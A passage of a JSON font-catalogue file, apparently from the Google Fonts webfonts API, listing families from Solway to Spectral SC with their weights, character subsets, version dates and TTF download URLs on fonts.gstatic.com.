\"http://fonts.gstatic.com/s/solway/v17/AMOTz46Cs2uTAOCuIlwZms0QW3mqyg.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Song Myung\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"korean\",\n        \"latin\"\n      ],\n      \"version\": \"v20\",\n      \"lastModified\": \"2022-09-27\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/songmyung/v20/1cX2aUDWAJH5-EIC7DIhr1GqhcitzeM.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Sono\",\n      \"variants\": [\n        \"200\",\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"800\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v1\",\n      \"lastModified\": \"2022-11-09\",\n      \"files\": {\n        \"200\": \"http://fonts.gstatic.com/s/sono/v1/aFT97PNiY3U2Cqf_aYEN64CYaK18YWJEsV6u-QLiOsxVNkWdEnR4qYeB4Q.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/sono/v1/aFT97PNiY3U2Cqf_aYEN64CYaK18YWJEsV6u-QLiOsxV6EWdEnR4qYeB4Q.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/sono/v1/aFT97PNiY3U2Cqf_aYEN64CYaK18YWJEsV6u-QLiOsxVtkWdEnR4qYeB4Q.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/sono/v1/aFT97PNiY3U2Cqf_aYEN64CYaK18YWJEsV6u-QLiOsxVhEWdEnR4qYeB4Q.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/sono/v1/aFT97PNiY3U2Cqf_aYEN64CYaK18YWJEsV6u-QLiOsxVaEKdEnR4qYeB4Q.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/sono/v1/aFT97PNiY3U2Cqf_aYEN64CYaK18YWJEsV6u-QLiOsxVUUKdEnR4qYeB4Q.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/sono/v1/aFT97PNiY3U2Cqf_aYEN64CYaK18YWJEsV6u-QLiOsxVNkKdEnR4qYeB4Q.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Sonsie One\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v21\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/sonsieone/v21/PbymFmP_EAnPqbKaoc18YVu80lbp8JM.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Sora\",\n      \"variants\": [\n        \"100\",\n        \"200\",\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"800\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v11\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"100\": \"http://fonts.gstatic.com/s/sora/v11/xMQOuFFYT72X5wkB_18qmnndmSdSn3-KIwNhBti0.ttf\",\n        \"200\": \"http://fonts.gstatic.com/s/sora/v11/xMQOuFFYT72X5wkB_18qmnndmSfSnn-KIwNhBti0.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/sora/v11/xMQOuFFYT72X5wkB_18qmnndmScMnn-KIwNhBti0.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/sora/v11/xMQOuFFYT72X5wkB_18qmnndmSdSnn-KIwNhBti0.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/sora/v11/xMQOuFFYT72X5wkB_18qmnndmSdgnn-KIwNhBti0.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/sora/v11/xMQOuFFYT72X5wkB_18qmnndmSeMmX-KIwNhBti0.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/sora/v11/xMQOuFFYT72X5wkB_18qmnndmSe1mX-KIwNhBti0.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/sora/v11/xMQOuFFYT72X5wkB_18qmnndmSfSmX-KIwNhBti0.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Sorts Mill Goudy\",\n      \"variants\": [\n        \"regular\",\n        \"italic\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v15\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/sortsmillgoudy/v15/Qw3GZR9MED_6PSuS_50nEaVrfzgEXH0OjpM75PE.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/sortsmillgoudy/v15/Qw3AZR9MED_6PSuS_50nEaVrfzgEbH8EirE-9PGLfQ.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Source Code Pro\",\n      \"variants\": [\n        \"200\",\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"800\",\n        \"900\",\n        \"200italic\",\n        \"300italic\",\n        \"italic\",\n        \"500italic\",\n        \"600italic\",\n        \"700italic\",\n        \"800italic\",\n        \"900italic\"\n      ],\n      \"subsets\": [\n        \"cyrillic\",\n        \"cyrillic-ext\",\n        \"greek\",\n        \"greek-ext\",\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v22\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"200\": \"http://fonts.gstatic.com/s/sourcecodepro/v22/HI_diYsKILxRpg3hIP6sJ7fM7PqPMcMnZFqUwX28DEyQhM5hTXUcdJg.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/sourcecodepro/v22/HI_diYsKILxRpg3hIP6sJ7fM7PqPMcMnZFqUwX28DJKQhM5hTXUcdJg.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/sourcecodepro/v22/HI_diYsKILxRpg3hIP6sJ7fM7PqPMcMnZFqUwX28DMyQhM5hTXUcdJg.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/sourcecodepro/v22/HI_diYsKILxRpg3hIP6sJ7fM7PqPMcMnZFqUwX28DP6QhM5hTXUcdJg.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/sourcecodepro/v22/HI_diYsKILxRpg3hIP6sJ7fM7PqPMcMnZFqUwX28DBKXhM5hTXUcdJg.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/sourcecodepro/v22/HI_diYsKILxRpg3hIP6sJ7fM7PqPMcMnZFqUwX28DCuXhM5hTXUcdJg.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/sourcecodepro/v22/HI_diYsKILxRpg3hIP6sJ7fM7PqPMcMnZFqUwX28DEyXhM5hTXUcdJg.ttf\",\n        \"900\": \"http://fonts.gstatic.com/s/sourcecodepro/v22/HI_diYsKILxRpg3hIP6sJ7fM7PqPMcMnZFqUwX28DGWXhM5hTXUcdJg.ttf\",\n        \"200italic\": \"http://fonts.gstatic.com/s/sourcecodepro/v22/HI_jiYsKILxRpg3hIP6sJ7fM7PqlOPHYvDP_W9O7GQTT7I1rSVcZZJiGpw.ttf\",\n        \"300italic\": \"http://fonts.gstatic.com/s/sourcecodepro/v22/HI_jiYsKILxRpg3hIP6sJ7fM7PqlOPHYvDP_W9O7GQTTMo1rSVcZZJiGpw.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/sourcecodepro/v22/HI_jiYsKILxRpg3hIP6sJ7fM7PqlOPHYvDP_W9O7GQTTbI1rSVcZZJiGpw.ttf\",\n        \"500italic\": \"http://fonts.gstatic.com/s/sourcecodepro/v22/HI_jiYsKILxRpg3hIP6sJ7fM7PqlOPHYvDP_W9O7GQTTXo1rSVcZZJiGpw.ttf\",\n        \"600italic\": \"http://fonts.gstatic.com/s/sourcecodepro/v22/HI_jiYsKILxRpg3hIP6sJ7fM7PqlOPHYvDP_W9O7GQTTsoprSVcZZJiGpw.ttf\",\n        \"700italic\": \"http://fonts.gstatic.com/s/sourcecodepro/v22/HI_jiYsKILxRpg3hIP6sJ7fM7PqlOPHYvDP_W9O7GQTTi4prSVcZZJiGpw.ttf\",\n        \"800italic\": \"http://fonts.gstatic.com/s/sourcecodepro/v22/HI_jiYsKILxRpg3hIP6sJ7fM7PqlOPHYvDP_W9O7GQTT7IprSVcZZJiGpw.ttf\",\n        \"900italic\": \"http://fonts.gstatic.com/s/sourcecodepro/v22/HI_jiYsKILxRpg3hIP6sJ7fM7PqlOPHYvDP_W9O7GQTTxYprSVcZZJiGpw.ttf\"\n      },\n      \"category\": \"monospace\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Source Sans 3\",\n      \"variants\": [\n        \"200\",\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"800\",\n        \"900\",\n        \"200italic\",\n        \"300italic\",\n        \"italic\",\n        \"500italic\",\n        \"600italic\",\n        \"700italic\",\n        \"800italic\",\n        \"900italic\"\n      ],\n      \"subsets\": [\n        \"cyrillic\",\n        \"cyrillic-ext\",\n        \"greek\",\n        \"greek-ext\",\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v8\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"200\": \"http://fonts.gstatic.com/s/sourcesans3/v8/nwpBtKy2OAdR1K-IwhWudF-R9QMylBJAV3Bo8Kw461EN_io6npfB.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/sourcesans3/v8/nwpBtKy2OAdR1K-IwhWudF-R9QMylBJAV3Bo8Kzm61EN_io6npfB.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/sourcesans3/v8/nwpBtKy2OAdR1K-IwhWudF-R9QMylBJAV3Bo8Ky461EN_io6npfB.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/sourcesans3/v8/nwpBtKy2OAdR1K-IwhWudF-R9QMylBJAV3Bo8KyK61EN_io6npfB.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/sourcesans3/v8/nwpBtKy2OAdR1K-IwhWudF-R9QMylBJAV3Bo8Kxm7FEN_io6npfB.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/sourcesans3/v8/nwpBtKy2OAdR1K-IwhWudF-R9QMylBJAV3Bo8Kxf7FEN_io6npfB.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/sourcesans3/v8/nwpBtKy2OAdR1K-IwhWudF-R9QMylBJAV3Bo8Kw47FEN_io6npfB.ttf\",\n        \"900\": \"http://fonts.gstatic.com/s/sourcesans3/v8/nwpBtKy2OAdR1K-IwhWudF-R9QMylBJAV3Bo8KwR7FEN_io6npfB.ttf\",\n        \"200italic\": \"http://fonts.gstatic.com/s/sourcesans3/v8/nwpDtKy2OAdR1K-IwhWudF-R3woAa8opPOrG97lwqDlO9C4Ym4fB3Ts.ttf\",\n        \"300italic\": \"http://fonts.gstatic.com/s/sourcesans3/v8/nwpDtKy2OAdR1K-IwhWudF-R3woAa8opPOrG97lwqOdO9C4Ym4fB3Ts.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/sourcesans3/v8/nwpDtKy2OAdR1K-IwhWudF-R3woAa8opPOrG97lwqLlO9C4Ym4fB3Ts.ttf\",\n        \"500italic\": \"http://fonts.gstatic.com/s/sourcesans3/v8/nwpDtKy2OAdR1K-IwhWudF-R3woAa8opPOrG97lwqItO9C4Ym4fB3Ts.ttf\",\n        \"600italic\": \"http://fonts.gstatic.com/s/sourcesans3/v8/nwpDtKy2OAdR1K-IwhWudF-R3woAa8opPOrG97lwqGdJ9C4Ym4fB3Ts.ttf\",\n        \"700italic\": \"http://fonts.gstatic.com/s/sourcesans3/v8/nwpDtKy2OAdR1K-IwhWudF-R3woAa8opPOrG97lwqF5J9C4Ym4fB3Ts.ttf\",\n        \"800italic\": \"http://fonts.gstatic.com/s/sourcesans3/v8/nwpDtKy2OAdR1K-IwhWudF-R3woAa8opPOrG97lwqDlJ9C4Ym4fB3Ts.ttf\",\n        \"900italic\": \"http://fonts.gstatic.com/s/sourcesans3/v8/nwpDtKy2OAdR1K-IwhWudF-R3woAa8opPOrG97lwqBBJ9C4Ym4fB3Ts.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Source Sans Pro\",\n      \"variants\": [\n        \"200\",\n        \"200italic\",\n        \"300\",\n        \"300italic\",\n        \"regular\",\n        \"italic\",\n        \"600\",\n        \"600italic\",\n        \"700\",\n        \"700italic\",\n        \"900\",\n        \"900italic\"\n      ],\n      \"subsets\": [\n        \"cyrillic\",\n        \"cyrillic-ext\",\n        \"greek\",\n        \"greek-ext\",\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v21\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"200\": \"http://fonts.gstatic.com/s/sourcesanspro/v21/6xKydSBYKcSV-LCoeQqfX1RYOo3i94_AkB1v_8CGxg.ttf\",\n        \"200italic\": \"http://fonts.gstatic.com/s/sourcesanspro/v21/6xKwdSBYKcSV-LCoeQqfX1RYOo3qPZYokRdr3cWWxg40.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/sourcesanspro/v21/6xKydSBYKcSV-LCoeQqfX1RYOo3ik4zAkB1v_8CGxg.ttf\",\n        \"300italic\": \"http://fonts.gstatic.com/s/sourcesanspro/v21/6xKwdSBYKcSV-LCoeQqfX1RYOo3qPZZMkhdr3cWWxg40.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/sourcesanspro/v21/6xK3dSBYKcSV-LCoeQqfX1RYOo3aP6TkmDZz9g.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/sourcesanspro/v21/6xK1dSBYKcSV-LCoeQqfX1RYOo3qPa7gujNj9tmf.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/sourcesanspro/v21/6xKydSBYKcSV-LCoeQqfX1RYOo3i54rAkB1v_8CGxg.ttf\",\n        \"600italic\": \"http://fonts.gstatic.com/s/sourcesanspro/v21/6xKwdSBYKcSV-LCoeQqfX1RYOo3qPZY4lBdr3cWWxg40.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/sourcesanspro/v21/6xKydSBYKcSV-LCoeQqfX1RYOo3ig4vAkB1v_8CGxg.ttf\",\n        \"700italic\": \"http://fonts.gstatic.com/s/sourcesanspro/v21/6xKwdSBYKcSV-LCoeQqfX1RYOo3qPZZclRdr3cWWxg40.ttf\",\n        \"900\": \"http://fonts.gstatic.com/s/sourcesanspro/v21/6xKydSBYKcSV-LCoeQqfX1RYOo3iu4nAkB1v_8CGxg.ttf\",\n        \"900italic\": \"http://fonts.gstatic.com/s/sourcesanspro/v21/6xKwdSBYKcSV-LCoeQqfX1RYOo3qPZZklxdr3cWWxg40.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Source Serif 4\",\n      \"variants\": [\n        \"200\",\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"800\",\n        \"900\",\n        \"200italic\",\n        \"300italic\",\n        \"italic\",\n        \"500italic\",\n        \"600italic\",\n        \"700italic\",\n        \"800italic\",\n        \"900italic\"\n      ],\n      \"subsets\": [\n        \"cyrillic\",\n        \"cyrillic-ext\",\n        \"greek\",\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v7\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"200\": \"http://fonts.gstatic.com/s/sourceserif4/v7/vEFy2_tTDB4M7-auWDN0ahZJW3IX2ih5nk3AucvUHf6OAVIJmeUDygwjipdqrhxXD-wGvjU.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/sourceserif4/v7/vEFy2_tTDB4M7-auWDN0ahZJW3IX2ih5nk3AucvUHf6OAVIJmeUDygwjiklqrhxXD-wGvjU.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/sourceserif4/v7/vEFy2_tTDB4M7-auWDN0ahZJW3IX2ih5nk3AucvUHf6OAVIJmeUDygwjihdqrhxXD-wGvjU.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/sourceserif4/v7/vEFy2_tTDB4M7-auWDN0ahZJW3IX2ih5nk3AucvUHf6OAVIJmeUDygwjiiVqrhxXD-wGvjU.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/sourceserif4/v7/vEFy2_tTDB4M7-auWDN0ahZJW3IX2ih5nk3AucvUHf6OAVIJmeUDygwjisltrhxXD-wGvjU.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/sourceserif4/v7/vEFy2_tTDB4M7-auWDN0ahZJW3IX2ih5nk3AucvUHf6OAVIJmeUDygwjivBtrhxXD-wGvjU.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/sourceserif4/v7/vEFy2_tTDB4M7-auWDN0ahZJW3IX2ih5nk3AucvUHf6OAVIJmeUDygwjipdtrhxXD-wGvjU.ttf\",\n        \"900\": \"http://fonts.gstatic.com/s/sourceserif4/v7/vEFy2_tTDB4M7-auWDN0ahZJW3IX2ih5nk3AucvUHf6OAVIJmeUDygwjir5trhxXD-wGvjU.ttf\",\n        \"200italic\": \"http://fonts.gstatic.com/s/sourceserif4/v7/vEF02_tTDB4M7-auWDN0ahZJW1ge6NmXpVAHV83Bfb_US2D2QYxoUKIkn98pxl9dC84DrjXEXw.ttf\",\n        \"300italic\": \"http://fonts.gstatic.com/s/sourceserif4/v7/vEF02_tTDB4M7-auWDN0ahZJW1ge6NmXpVAHV83Bfb_US2D2QYxoUKIkn98pGF9dC84DrjXEXw.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/sourceserif4/v7/vEF02_tTDB4M7-auWDN0ahZJW1ge6NmXpVAHV83Bfb_US2D2QYxoUKIkn98pRl9dC84DrjXEXw.ttf\",\n        \"500italic\": \"http://fonts.gstatic.com/s/sourceserif4/v7/vEF02_tTDB4M7-auWDN0ahZJW1ge6NmXpVAHV83Bfb_US2D2QYxoUKIkn98pdF9dC84DrjXEXw.ttf\",\n        \"600italic\": \"http://fonts.gstatic.com/s/sourceserif4/v7/vEF02_tTDB4M7-auWDN0ahZJW1ge6NmXpVAHV83Bfb_US2D2QYxoUKIkn98pmFhdC84DrjXEXw.ttf\",\n        \"700italic\": \"http://fonts.gstatic.com/s/sourceserif4/v7/vEF02_tTDB4M7-auWDN0ahZJW1ge6NmXpVAHV83Bfb_US2D2QYxoUKIkn98poVhdC84DrjXEXw.ttf\",\n        \"800italic\": \"http://fonts.gstatic.com/s/sourceserif4/v7/vEF02_tTDB4M7-auWDN0ahZJW1ge6NmXpVAHV83Bfb_US2D2QYxoUKIkn98pxlhdC84DrjXEXw.ttf\",\n        \"900italic\": \"http://fonts.gstatic.com/s/sourceserif4/v7/vEF02_tTDB4M7-auWDN0ahZJW1ge6NmXpVAHV83Bfb_US2D2QYxoUKIkn98p71hdC84DrjXEXw.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Source Serif Pro\",\n      \"variants\": [\n        \"200\",\n        \"200italic\",\n        \"300\",\n        \"300italic\",\n        \"regular\",\n        \"italic\",\n        \"600\",\n        \"600italic\",\n        \"700\",\n        \"700italic\",\n        \"900\",\n        \"900italic\"\n      ],\n      \"subsets\": [\n        \"cyrillic\",\n        \"cyrillic-ext\",\n        \"greek\",\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v15\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"200\": \"http://fonts.gstatic.com/s/sourceserifpro/v15/neIXzD-0qpwxpaWvjeD0X88SAOeasbsfhSugxYUvZrI.ttf\",\n        \"200italic\": \"http://fonts.gstatic.com/s/sourceserifpro/v15/neIVzD-0qpwxpaWvjeD0X88SAOeauXEGbSqqwacqdrKvbQ.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/sourceserifpro/v15/neIXzD-0qpwxpaWvjeD0X88SAOeasd8chSugxYUvZrI.ttf\",\n        \"300italic\": \"http://fonts.gstatic.com/s/sourceserifpro/v15/neIVzD-0qpwxpaWvjeD0X88SAOeauXEGCSmqwacqdrKvbQ.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/sourceserifpro/v15/neIQzD-0qpwxpaWvjeD0X88SAOeaiXM0oSOL2Yw.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/sourceserifpro/v15/neIWzD-0qpwxpaWvjeD0X88SAOeauXE-pQGOyYw2fw.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/sourceserifpro/v15/neIXzD-0qpwxpaWvjeD0X88SAOeasasahSugxYUvZrI.ttf\",\n        \"600italic\": \"http://fonts.gstatic.com/s/sourceserifpro/v15/neIVzD-0qpwxpaWvjeD0X88SAOeauXEGfS-qwacqdrKvbQ.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/sourceserifpro/v15/neIXzD-0qpwxpaWvjeD0X88SAOeasc8bhSugxYUvZrI.ttf\",\n        \"700italic\": \"http://fonts.gstatic.com/s/sourceserifpro/v15/neIVzD-0qpwxpaWvjeD0X88SAOeauXEGGS6qwacqdrKvbQ.ttf\",\n        \"900\": \"http://fonts.gstatic.com/s/sourceserifpro/v15/neIXzD-0qpwxpaWvjeD0X88SAOeasfcZhSugxYUvZrI.ttf\",\n        \"900italic\": \"http://fonts.gstatic.com/s/sourceserifpro/v15/neIVzD-0qpwxpaWvjeD0X88SAOeauXEGISyqwacqdrKvbQ.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Space Grotesk\",\n      \"variants\": [\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v15\",\n      \"lastModified\": \"2023-01-06\",\n      \"files\": {\n        \"300\": \"http://fonts.gstatic.com/s/spacegrotesk/v15/V8mQoQDjQSkFtoMM3T6r8E7mF71Q-gOoraIAEj62UUsjNsFjTDJK.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/spacegrotesk/v15/V8mQoQDjQSkFtoMM3T6r8E7mF71Q-gOoraIAEj7oUUsjNsFjTDJK.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/spacegrotesk/v15/V8mQoQDjQSkFtoMM3T6r8E7mF71Q-gOoraIAEj7aUUsjNsFjTDJK.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/spacegrotesk/v15/V8mQoQDjQSkFtoMM3T6r8E7mF71Q-gOoraIAEj42VksjNsFjTDJK.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/spacegrotesk/v15/V8mQoQDjQSkFtoMM3T6r8E7mF71Q-gOoraIAEj4PVksjNsFjTDJK.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Space Mono\",\n      \"variants\": [\n        \"regular\",\n        \"italic\",\n        \"700\",\n        \"700italic\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v12\",\n      \"lastModified\": \"2023-01-06\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/spacemono/v12/i7dPIFZifjKcF5UAWdDRUEZ2RFq7AwU.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/spacemono/v12/i7dNIFZifjKcF5UAWdDRYER8QHi-EwWMbg.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/spacemono/v12/i7dMIFZifjKcF5UAWdDRaPpZYFKQHwyVd3U.ttf\",\n        \"700italic\": \"http://fonts.gstatic.com/s/spacemono/v12/i7dSIFZifjKcF5UAWdDRYERE_FeaGy6QZ3WfYg.ttf\"\n      },\n      \"category\": \"monospace\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Special Elite\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v18\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/specialelite/v18/XLYgIZbkc4JPUL5CVArUVL0nhncESXFtUsM.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Spectral\",\n      \"variants\": [\n        \"200\",\n        \"200italic\",\n        \"300\",\n        \"300italic\",\n        \"regular\",\n        \"italic\",\n        \"500\",\n        \"500italic\",\n        \"600\",\n        \"600italic\",\n        \"700\",\n        \"700italic\",\n        \"800\",\n        \"800italic\"\n      ],\n      \"subsets\": [\n        \"cyrillic\",\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v13\",\n      \"lastModified\": \"2023-01-06\",\n      \"files\": {\n        \"200\": \"http://fonts.gstatic.com/s/spectral/v13/rnCs-xNNww_2s0amA9v2s13GY_etWWIJ.ttf\",\n        \"200italic\": \"http://fonts.gstatic.com/s/spectral/v13/rnCu-xNNww_2s0amA9M8qrXHafOPXHIJErY.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/spectral/v13/rnCs-xNNww_2s0amA9uSsF3GY_etWWIJ.ttf\",\n        \"300italic\": \"http://fonts.gstatic.com/s/spectral/v13/rnCu-xNNww_2s0amA9M8qtHEafOPXHIJErY.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/spectral/v13/rnCr-xNNww_2s0amA-M-mHnOSOuk.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/spectral/v13/rnCt-xNNww_2s0amA9M8kn3sTfukQHs.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/spectral/v13/rnCs-xNNww_2s0amA9vKsV3GY_etWWIJ.ttf\",\n        \"500italic\": \"http://fonts.gstatic.com/s/spectral/v13/rnCu-xNNww_2s0amA9M8qonFafOPXHIJErY.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/spectral/v13/rnCs-xNNww_2s0amA9vmtl3GY_etWWIJ.ttf\",\n        \"600italic\": \"http://fonts.gstatic.com/s/spectral/v13/rnCu-xNNww_2s0amA9M8qqXCafOPXHIJErY.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/spectral/v13/rnCs-xNNww_2s0amA9uCt13GY_etWWIJ.ttf\",\n        \"700italic\": \"http://fonts.gstatic.com/s/spectral/v13/rnCu-xNNww_2s0amA9M8qsHDafOPXHIJErY.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/spectral/v13/rnCs-xNNww_2s0amA9uetF3GY_etWWIJ.ttf\",\n        \"800italic\": \"http://fonts.gstatic.com/s/spectral/v13/rnCu-xNNww_2s0amA9M8qt3AafOPXHIJErY.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Spectral SC\",\n      \"variants\": [\n        \"200\",\n        \"200italic\",\n        \"300\",\n        \"300italic\",\n        \"regular\",\n        \"italic\",\n        \"500\",\n        \"500italic\",\n        \"600\",\n        \"600italic\",\n        \"700\",\n        \"700italic\",\n        \"800\",\n        \"800italic\"\n      ],\n      \"subsets\": [\n        \"cyrillic\",\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v11\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"200\": \"http://fonts.gstatic.com/s/spectralsc/v11/Ktk0ALCRZonmalTgyPmRfs1qwkTXPYeVXJZB.ttf\",\n        \"200italic\": \"http://fonts.gstatic.com/s/spectralsc/v11/Ktk2ALCRZonmalTgyPmRfsWg26zWN4O3WYZB_sU.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/spectralsc/v11/Ktk0ALCRZonmalTgyPmRfs0OwUTXPYeVXJZB.ttf\",\n        \"300italic\": \"http://fonts.gstatic.com/s/spectralsc/v11/Ktk2ALCRZonmalTgyPmRfsWg28jVN4O3WYZB_sU.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/spectralsc/v11/KtkpALCRZonmalTgyPmRfvWi6WDfFpuc.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/spectralsc/v11/KtkrALCRZonmalTgyPmRfsWg42T9E4ucRY8.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/spectralsc/v11/Ktk0ALCRZonmalTgyPmRfs1WwETXPYeVXJZB.ttf\",\n        \"500italic\": \"http://fonts.gstatic.com/s/spectralsc/v11/Ktk2ALCRZonmalTgyPmRfsWg25DUN4O3WYZB_sU.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/spectralsc/v11/Ktk0ALCRZonmalTgyPmRfs16x0TXPYeVXJZB.ttf\",\n        \"600italic\": \"http://fonts.gstatic.com/s/spectralsc/v11/Ktk2ALCRZonmalTgyPmRfsWg27zTN4O3WYZB_sU.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/spectralsc/v11/Ktk0ALCRZonmalTgyPmRfs0exkTXPYeVXJZB.ttf\",\n        \"700italic\": 